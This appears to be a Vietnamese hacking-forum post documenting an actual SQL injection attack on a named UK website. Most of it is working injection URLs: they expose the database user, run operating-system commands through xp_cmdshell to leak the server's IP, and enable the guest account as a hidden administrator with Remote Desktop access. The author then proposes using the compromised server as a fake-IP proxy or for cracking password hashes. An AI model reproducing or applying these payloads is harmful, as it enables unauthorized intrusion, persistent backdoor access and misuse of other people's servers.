Link bug:
Code:
http://www.funds4me.co.uk/stores.asp?catID=43'
Code:
http://www.funds4me.co.uk/stores.asp?catID=43'%20and%201=convert(int,system_user)--sp_password
Trích:
| [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'sa' to a column of data type int. |
Đầu tiên đổ kết quả của lệnh ipconfig vào table keke:
Code:
http://www.funds4me.co.uk/stores.asp?catID=43';drop%20table%20keke%20create%20table%20keke%20(id%20int%20identity,nd%20varchar(1000))%20insert%20into%20keke(nd)%20exec%20master..xp_cmdshell%20'ipconfig'--sp_password
Code:
http://www.funds4me.co.uk/stores.asp?catID=43'%20and%201=convert(int,(select%20top%201%20nd%20from%20keke%20where%20nd%20like%20('%25Ip%20address%25')))--sp_password
Trích:
| [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value ' IP Address. . . . . . . . . . . . : 212.69.230.65 ' to a column of data type int. |
Ở đây tôi chọn giải pháp active acc guest và nâng guest lên admin cho đỡ bị lộ
Active guest acc:
Code:
http://www.funds4me.co.uk/stores.asp?catID=43';exec master..xp_cmdshell 'net user guest /active:yes';--sp_password
Code:
http://www.funds4me.co.uk/stores.asp?catID=43';exec master..xp_cmdshell 'net user guest xxxxxx';--sp_password
Code:
http://www.funds4me.co.uk/stores.asp?catID=43';exec master..xp_cmdshell 'net localgroup administrators guest /add';--sp_password
Code:
http://www.funds4me.co.uk/stores.asp?catID=43';exec master..xp_cmdshell 'net localgroup "Remote Desktop Users" guest /add';--sp_password
(pass đã change, ai thik thì tự tạo lại)
P/S: cái này mà tạo Virtual Private Srv fake ip rất good, hoặc để crack md5 pass hash.